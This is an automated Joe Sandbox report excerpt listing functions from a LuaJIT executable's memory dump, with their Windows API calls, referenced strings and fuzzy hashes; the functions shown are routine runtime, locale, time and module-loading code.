Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 51f52da4c5a4008aadc5bd230d6ecd048176a1ee57bc4013da91a956b30600b9
Instruction ID: 9052c0f9231d496afc2f7230fb853addf2030a55ea510f6f38085db3330d32b0
Opcode Fuzzy Hash: 51f52da4c5a4008aadc5bd230d6ecd048176a1ee57bc4013da91a956b30600b9
Instruction Fuzzy Hash: 8D314F37628B8186DB60CF25E8402AE73B4FB88798F500536EE9D87B99DF3CD5558B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E8C81C Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF677E8C88B
WriteFile.KERNEL32 ref: 00007FF677E8CB42
WriteFile.KERNEL32 ref: 00007FF677E8CB94
GetLastError.KERNEL32 ref: 00007FF677E8CC96
GetLastError.KERNEL32 ref: 00007FF677E8CCF6

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: d781c31e04745800bfa0f421d82ff93f3733d0fe2e0e7ef74ea63fc8014f1798
Instruction ID: 5b48dbbaf23f76c13f94c04ecc469612bdad8e9918a9e81664ed22691cc1c3ce
Opcode Fuzzy Hash: d781c31e04745800bfa0f421d82ff93f3733d0fe2e0e7ef74ea63fc8014f1798
Instruction Fuzzy Hash: 80E1E063B28B818AE700CB64D4401AD7BB1FB46788F146276DE4EA7BA8DE3CD556C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E93014 Relevance: 6.1, APIs: 4, Instructions: 149timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF677E93042

Part of subcall function 00007FF677E92780: _invalid_parameter_noinfo.LIBCMT ref: 00007FF677E92794

_get_daylight.LIBCMT ref: 00007FF677E93053

Part of subcall function 00007FF677E92720: _invalid_parameter_noinfo.LIBCMT ref: 00007FF677E92734

_get_daylight.LIBCMT ref: 00007FF677E93064

Part of subcall function 00007FF677E92750: _invalid_parameter_noinfo.LIBCMT ref: 00007FF677E92764

Part of subcall function 00007FF677E89630: HeapFree.KERNEL32(?,?,?,00007FF677E99018,?,?,?,00007FF677E9939B,?,?,00000019,00007FF677E99A70,?,?,?,00007FF677E999A3), ref: 00007FF677E89646
Part of subcall function 00007FF677E89630: GetLastError.KERNEL32(?,?,?,00007FF677E99018,?,?,?,00007FF677E9939B,?,?,00000019,00007FF677E99A70,?,?,?,00007FF677E999A3), ref: 00007FF677E89658

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF677E93270), ref: 00007FF677E9308B

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3458911817-0
Opcode ID: b1694709959b112dda49aced4665659e4135d8c6dd5ee1d3d9ed6f6d5bcf2363
Instruction ID: f7c3f80eddbbaa2b24d6b7ceaa48dfc27756cbf67f8919a59517e2f8dea1b60e
Opcode Fuzzy Hash: b1694709959b112dda49aced4665659e4135d8c6dd5ee1d3d9ed6f6d5bcf2363
Instruction Fuzzy Hash: A3618C37A2864286EB20DF22E8815A97B61FF68784F454235EE4DC7B96DF3CE4418B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E92C9C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 244COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF677E95B84: _invalid_parameter_noinfo.LIBCMT ref: 00007FF677E95BB2

_get_daylight.LIBCMT ref: 00007FF677E92DB9
_get_daylight.LIBCMT ref: 00007FF677E92DCA

Strings

?, xrefs: 00007FF677E92D45

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 586c49851570bae013627ce3286465824fb7c3165ce0ca9086f662d82254d2e5
Instruction ID: 9740a28b996cc16d85e7419d54d52b2ef924a852eeac634890f0a849671f4dad
Opcode Fuzzy Hash: 586c49851570bae013627ce3286465824fb7c3165ce0ca9086f662d82254d2e5
Instruction Fuzzy Hash: D591F427E2825246EF209B26D4402BA6799EFA0BD4F554131EE4C87BC5EF3CD4928B41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E89CD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF677E89D09
GetLocaleInfoW.KERNEL32(?,?,?,?,?,00007FF677E876EA), ref: 00007FF677E89D37

Strings

GetLocaleInfoEx, xrefs: 00007FF677E89CEC, 00007FF677E89CFD

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: InfoLocaletry_get_function
String ID: GetLocaleInfoEx
API String ID: 2200034068-2904428671
Opcode ID: 1320189c10d08737c10867949436e1f60fcdb1951e034d40a47ea20f6378357c
Instruction ID: 2c9021611a8b0d125c6f3c5b5318608109e1c933cd6cc876e48e09a6d7ef6df3
Opcode Fuzzy Hash: 1320189c10d08737c10867949436e1f60fcdb1951e034d40a47ea20f6378357c
Instruction Fuzzy Hash: 2301812AF18B42C2E7509B5AB4414BAB770BF84BC0F594436EE5C83B95CE3CE5018744

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E225B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF677E225D2
FormatMessageA.KERNEL32 ref: 00007FF677E22602

Strings

system error %d, xrefs: 00007FF677E2261E

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID: system error %d
API String ID: 3479602957-1688351658
Opcode ID: 8332af026310832f434476acea3ba6885ae8396224c2dbcaec45421bbfbf08f1
Instruction ID: 3996fa01a0921cc2bac1798cb9e415faa9744888f4dbb15b001d3cf6c96dc1f0
Opcode Fuzzy Hash: 8332af026310832f434476acea3ba6885ae8396224c2dbcaec45421bbfbf08f1
Instruction Fuzzy Hash: F6017823A2CA8282F760CB15F8513AA73B0FB88784F455631DE8D87BA9DF3CD4548B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E9A728 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF677E8AD3C: GetLastError.KERNEL32(?,?,?,00007FF677E8D24A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF677E8D143), ref: 00007FF677E8AD4B
Part of subcall function 00007FF677E8AD3C: SetLastError.KERNEL32(?,?,?,00007FF677E8D24A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF677E8D143), ref: 00007FF677E8ADE9

EnumSystemLocalesW.KERNEL32(?,?,?,00007FF677E9AF13,?,00000000,00000092,?,?,00000000,?,00007FF677E87511), ref: 00007FF677E9A7C6

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 313ab806442ddc55e6728cbcc07408532ae73105c66a65031aa52fc8f57541a1
Instruction ID: 686cb42410b1756f998fb59f29a33e267ec6b2604a7495ca0b8d786317597d75
Opcode Fuzzy Hash: 313ab806442ddc55e6728cbcc07408532ae73105c66a65031aa52fc8f57541a1
Instruction Fuzzy Hash: 2811E467E286458AEB158F25D0402B877B0FBA0BE4F448135CAA9833D0DE3CD5D1CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E9A7F8 Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF677E8AD3C: GetLastError.KERNEL32(?,?,?,00007FF677E8D24A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF677E8D143), ref: 00007FF677E8AD4B
Part of subcall function 00007FF677E8AD3C: SetLastError.KERNEL32(?,?,?,00007FF677E8D24A,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF677E8D143), ref: 00007FF677E8ADE9

EnumSystemLocalesW.KERNEL32(?,?,?,00007FF677E9AECF,?,00000000,00000092,?,?,00000000,?,00007FF677E87511), ref: 00007FF677E9A876

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: be2d2b7cf1173ad143617d1f7b928713b92c0b1b47d53c5513583864fcad6446
Instruction ID: 623cdd9c217334fea89ce509bd3dbd636216f556f07c9cb219967b8df4df016f
Opcode Fuzzy Hash: be2d2b7cf1173ad143617d1f7b928713b92c0b1b47d53c5513583864fcad6446
Instruction Fuzzy Hash: 7901B163E2828586E7244F16E4447B9B6A1EF60BA4F459231DAA88B6D4DF7C9482CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E89698 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF677E89AD9,?,?,?,?,?,?,?,?,00000000,00007FF677E99D74), ref: 00007FF677E896E7

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 75e47ce64426d63513b806d8469cac1129a6abd0b6b52c14e35c1c6f6d18e525
Instruction ID: 30304fa5f965b0d2d5b89fbd051df3c5509a33b082c72a95f533d7955d199d5c
Opcode Fuzzy Hash: 75e47ce64426d63513b806d8469cac1129a6abd0b6b52c14e35c1c6f6d18e525
Instruction Fuzzy Hash: 1EF01476B28A4183E704DB29F8905A92365FB98B80F449235EE4EC3365CF3CE4A18700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E85614 Relevance: 1.5, APIs: 1, Instructions: 27timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF677E85628

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: 5e7a2b3c72ae519b92bcbc343919012f68244ffab357bb1726a105767d6b9190
Instruction ID: 3e2761df2c0c6b330ab5a2dd80cb4df290ff0e3cdf2246c860399507578115eb
Opcode Fuzzy Hash: 5e7a2b3c72ae519b92bcbc343919012f68244ffab357bb1726a105767d6b9190
Instruction Fuzzy Hash: 15F0E2E2F3950943EE048B1594147386291AF68BF4F046B31EE3E4E7C4EF1CD4454700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E8A0EC Relevance: 36.8, APIs: 10, Strings: 11, Instructions: 57COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF677E8A107
try_get_function.LIBVCRUNTIME ref: 00007FF677E8A126

Part of subcall function 00007FF677E89714: GetProcAddress.KERNEL32(?,00000000,00000002,00007FF677E89BF2,?,?,?,00007FF677E8AF02,?,?,?,00007FF677E7B3E1), ref: 00007FF677E8986C

try_get_function.LIBVCRUNTIME ref: 00007FF677E8A145

Part of subcall function 00007FF677E89714: LoadLibraryW.KERNELBASE(?,00000000,00000002,00007FF677E89BF2,?,?,?,00007FF677E8AF02,?,?,?,00007FF677E7B3E1), ref: 00007FF677E897B7
Part of subcall function 00007FF677E89714: GetLastError.KERNEL32(?,?,?,00007FF677E8AF02,?,?,?,00007FF677E7B3E1,?,?,?,?,00007FF677E90643), ref: 00007FF677E897C5
Part of subcall function 00007FF677E89714: LoadLibraryExW.KERNEL32(?,?,?,00007FF677E8AF02,?,?,?,00007FF677E7B3E1,?,?,?,?,00007FF677E90643), ref: 00007FF677E89807

try_get_function.LIBVCRUNTIME ref: 00007FF677E8A164

Part of subcall function 00007FF677E89714: FreeLibrary.KERNEL32(?,?,?,00007FF677E8AF02,?,?,?,00007FF677E7B3E1,?,?,?,?,00007FF677E90643), ref: 00007FF677E89840

try_get_function.LIBVCRUNTIME ref: 00007FF677E8A183
try_get_function.LIBVCRUNTIME ref: 00007FF677E8A1A2
try_get_function.LIBVCRUNTIME ref: 00007FF677E8A1C1
try_get_function.LIBVCRUNTIME ref: 00007FF677E8A1E0
try_get_function.LIBVCRUNTIME ref: 00007FF677E8A1FF
try_get_function.LIBVCRUNTIME ref: 00007FF677E8A21E

Strings

GetDateFormatEx, xrefs: 00007FF677E8A14A, 00007FF677E8A15D
LocaleNameToLCID, xrefs: 00007FF677E8A223, 00007FF677E8A236
CompareStringEx, xrefs: 00007FF677E8A10C, 00007FF677E8A11F
AreFileApisANSI, xrefs: 00007FF677E8A100
IsValidLocaleName, xrefs: 00007FF677E8A1C6, 00007FF677E8A1D9
EnumSystemLocalesEx, xrefs: 00007FF677E8A12B, 00007FF677E8A13E
GetUserDefaultLocaleName, xrefs: 00007FF677E8A1A7, 00007FF677E8A1BA
LCMapStringEx, xrefs: 00007FF677E8A1E5, 00007FF677E8A1F8
GetTimeFormatEx, xrefs: 00007FF677E8A188, 00007FF677E8A19B
LCIDToLocaleName, xrefs: 00007FF677E8A204, 00007FF677E8A217
GetLocaleInfoEx, xrefs: 00007FF677E8A169, 00007FF677E8A17C

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
API String ID: 3255926029-3252031757
Opcode ID: ab57395a1dd642966f0208e63bb71cca90a7c8cde1eec80d0d047cd74b423100
Instruction ID: 506c025cda45a1d6b348185a2e1c4585fb8d22d109f6ce8d6665dc7cead244d1
Opcode Fuzzy Hash: ab57395a1dd642966f0208e63bb71cca90a7c8cde1eec80d0d047cd74b423100
Instruction Fuzzy Hash: 6A318D62D2AB4BA1FB94DB58E862AF03371AF44740F8254B7D80D961A1DF3CB649C351

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E22050 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 157libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32(?,?,?,?,?,00007FF677E2150F), ref: 00007FF677E2215B
GetProcAddress.KERNEL32(?,?,?,?,?,00007FF677E2150F), ref: 00007FF677E221BB
GetModuleHandleA.KERNEL32(?,?,?,?,?,00007FF677E2150F), ref: 00007FF677E221F8
GetProcAddress.KERNEL32(?,?,?,?,?,00007FF677E2150F), ref: 00007FF677E22209
GetModuleHandleExA.KERNEL32(?,?,?,?,?,00007FF677E2150F), ref: 00007FF677E22226
GetProcAddress.KERNEL32(?,?,?,?,?,00007FF677E2150F), ref: 00007FF677E22238

Strings

luaopen_%s, xrefs: 00007FF677E221A3
_LOADLIB, xrefs: 00007FF677E22106
LOADLIB: %s, xrefs: 00007FF677E220AB, 00007FF677E22122
*, xrefs: 00007FF677E22181
luaJIT_BC_%s, xrefs: 00007FF677E221DB
path too long, xrefs: 00007FF677E22087

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: AddressProc$HandleModule$LibraryLoad
String ID: *$LOADLIB: %s$_LOADLIB$luaJIT_BC_%s$luaopen_%s$path too long
API String ID: 551388010-1299629974
Opcode ID: f3a9ec938cfb732e56b9769aeeac68db1fb725e4448d22c907f562046ba836a7
Instruction ID: c41a75f12504d5462be832129d5df5f23e6008a5d28a1fdd971d9671cb5bac50
Opcode Fuzzy Hash: f3a9ec938cfb732e56b9769aeeac68db1fb725e4448d22c907f562046ba836a7
Instruction Fuzzy Hash: C6517127B2CB4341FA14DB66A81037A6355AF86BE0F598731ED2E877D9DE3CE4518700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E20D70 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF677E85614: GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF677E85628

wcsftime.LIBCMT ref: 00007FF677E21021

Strings

year, xrefs: 00007FF677E20EEB
day, xrefs: 00007FF677E20E9E
isdst, xrefs: 00007FF677E20F5D
month, xrefs: 00007FF677E20EC3
hour, xrefs: 00007FF677E20E7E
min, xrefs: 00007FF677E20E5E
sec, xrefs: 00007FF677E20E3E
yday, xrefs: 00007FF677E20F35
wday, xrefs: 00007FF677E20F10

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: Time$FileSystemwcsftime
String ID: day$hour$isdst$min$month$sec$wday$yday$year
API String ID: 4211464514-297742768
Opcode ID: 070d3b06e21fe01fe3ff19482cb1903925334d2b5cccd04c797b402d5cae489a
Instruction ID: 885d34eb21c885805e1e996832fa22550769b0fd538e39f38dfc8d23b43b34b2
Opcode Fuzzy Hash: 070d3b06e21fe01fe3ff19482cb1903925334d2b5cccd04c797b402d5cae489a
Instruction Fuzzy Hash: C791B163B2CB8642EA20EB25A4402BE7395EF85BA0F514731EE6D877D5DF3CE5528700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E0FC30 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 134libraryloadersynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF677E0FCCD
DeleteCriticalSection.KERNEL32 ref: 00007FF677E0FCDA
LoadLibraryExA.KERNEL32 ref: 00007FF677E0FDCC
GetProcAddress.KERNEL32 ref: 00007FF677E0FDE8
GetProcAddress.KERNEL32 ref: 00007FF677E0FE03
InitializeCriticalSection.KERNEL32 ref: 00007FF677E0FE2E
CreateThread.KERNEL32 ref: 00007FF677E0FE57

Strings

winmm.dll, xrefs: 00007FF677E0FDC3
timeEndPeriod, xrefs: 00007FF677E0FDF5
timeBeginPeriod, xrefs: 00007FF677E0FDDE

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: AddressCriticalProcSection$CreateDeleteInitializeLibraryLoadObjectSingleThreadWait
String ID: timeBeginPeriod$timeEndPeriod$winmm.dll
API String ID: 3275198946-184456188
Opcode ID: 92299bf26988db8d84b207b018e881ffa7dc40e2995672530baf49bf9e40abd0
Instruction ID: 3719be1a2305c5b149c7537954c0db5774e699bac66a08680db7dc56e961f2f6
Opcode Fuzzy Hash: 92299bf26988db8d84b207b018e881ffa7dc40e2995672530baf49bf9e40abd0
Instruction Fuzzy Hash: 4D61573B93CB8289EB11CB11E8802793BA9FB44B95F680635CD9CD6265DF7CE466C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E21880 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 91libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF677E2194F
GetProcAddress.KERNEL32 ref: 00007FF677E21960
GetModuleHandleExA.KERNEL32 ref: 00007FF677E2197A
GetProcAddress.KERNEL32 ref: 00007FF677E2198C

Strings

'package.preload' must be a table, xrefs: 00007FF677E218C2
no field package.preload['%s'], xrefs: 00007FF677E219B3
preload, xrefs: 00007FF677E21899
luaJIT_BC_%s, xrefs: 00007FF677E2192E

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: no field package.preload['%s']$'package.preload' must be a table$luaJIT_BC_%s$preload
API String ID: 1646373207-4005544233
Opcode ID: d0425c6852bbb35cc95656d5f7ac72e07990d1df4d6a183fe3e63317efc0d1a0
Instruction ID: ec2bd34f2cfdb94dc5ac2244aeb72d6a399b5eb348bb974eb67c204660b99f49
Opcode Fuzzy Hash: d0425c6852bbb35cc95656d5f7ac72e07990d1df4d6a183fe3e63317efc0d1a0
Instruction Fuzzy Hash: E631B822B2CB4341EA44EB26AC511BD2362AF86BD0F595731ED2EC77DADE3CE5058700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E8243C Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 479COMMONLIBRARYCODE

